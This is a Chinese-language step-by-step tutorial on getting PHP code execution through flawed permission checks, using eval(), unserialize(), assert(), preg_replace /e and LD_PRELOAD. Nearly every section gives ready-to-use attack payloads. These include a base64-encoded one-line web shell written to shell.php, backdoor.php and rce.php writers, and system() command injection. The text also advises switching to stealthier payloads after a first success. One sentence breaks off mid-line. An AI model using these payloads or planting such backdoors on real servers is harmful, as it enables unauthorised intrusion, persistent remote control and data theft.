攻击者可通过eval()注入、反序列化漏洞及assert()函数绕过权限验证执行PHP代码:一、利用未过滤的eval()执行恶意角色参数;二、通过unserialize()触发危险魔术方法;三、用assert()替代eval()执行传入表达式。
当Web应用程序在权限验证环节存在逻辑缺陷或不安全的代码调用时,攻击者可能通过构造特定请求绕过校验并触发PHP代码执行。以下是几种常见的权限验证触发PHP代码执行的方法:
一、利用eval()函数配合未过滤的权限参数
某些系统将用户角色、模块标识等权限信息以字符串形式传入eval()执行,若该字符串未经过严格白名单校验,可被注入恶意PHP代码。
1、识别目标页面中是否存在类似eval("return $role_check;");的动态执行逻辑。
2、在请求中提交包含PHP代码的role参数,例如:role=1; phpinfo(); exit;。
立即学习“PHP免费学习笔记(深入)”;
3、观察响应体是否输出phpinfo()结果或报错信息中暴露代码执行痕迹。
4、确认成功后,替换为更隐蔽的payload,如:role=1; @file_put_contents('shell.php', base64_decode('PD9waHAgZXZhbCgkX1BPU1RbJ3o0J10pOz8+')); exit;。
二、通过反序列化漏洞在权限校验流程中触发__wakeup()或__destruct()
部分权限验证模块使用unserialize()解析用户可控的session或cookie数据,若类中定义了危险魔术方法且存在可利用的链,则可在反序列化过程中执行任意PHP代码。
1、捕获登录或鉴权请求中的serialized字符串,例如Cookie中的user_token=O:8:"UserAuth":1:{s:4:"role";s:5:"admin";}。
2、查找应用源码中已定义且含危险操作的类,重点关注__wakeup()内调用system()、exec()或file_put_contents()的类。
3、构造恶意序列化字符串,使反序列化后触发代码执行,例如注入s:4:"cmd";s:12:"whoami > a.txt";并匹配对应属性。
4、发送篡改后的序列化数据至权限验证接口,检查服务器是否生成预期文件或执行命令。
三、利用assert()函数替代eval()执行传入表达式
PHP低版本(
1、搜索代码中形如assert($_GET['perm'] . ' === "admin"');的语句。
2、向perm参数提交闭合原表达式的payload,例如:perm=1); phpinfo(); //。
3、验证响应中是否出现phpinfo()输出,确认assert成功执行后续代码。
4、部署持久化payload:perm=1); @file_put_contents('backdoor.php', $_POST['x']); //。
四、借助preg_replace()的/e修饰符执行替换内容
旧版PHP支持preg_replace()的e修饰符,允许在替换字符串中执行PHP代码。若权限校验中存在类似preg_replace('/(.*)/e', 'strtoupper("\\1")', $_GET['input'])且$input可控,则可触发执行。
1、定位使用了/e修饰符的正则替换逻辑,尤其关注$_GET、$_POST、$_COOKIE等变量作为模式或替换参数。
2、构造匹配规则使替换内容成为可执行PHP代码,例如:input={${phpinfo()}}(需配合特定正则模式)。
3、若正则允许任意字符匹配,尝试提交input=xxx; system($_GET['cmd']);并设置e修饰符。
4、发送请求并检查是否触发命令执行,成功后使用:input=1; @file_put_contents('rce.php', base64_decode($_GET['p']));。
五、通过LD_PRELOAD环境变量配合mail()或error_log()触发本地代码执行
在部分Linux服务器上,若权限验证流程中调用了mail()或error_log()且启用了sendmail路径可控,结合LD_PRELOAD劫持可实现PHP代码执行。
1、确认PHP配置中disable_functions未禁用mail()或error_log(),且open_basedir未限制临时目录。
2、上传编译好的共享对象文件(如log.so),其中__attribute__((constructor))函数调用system()。
3、设置环境变量:putenv("LD_PRELOAD=/tmp/log.so");,再调用mail()或error_log()触发加载。
4、构造最终触发链:mail('a@b.c', '', '', '', '-f'.$_GET['x']); 并配合LD_PRELOAD注入。
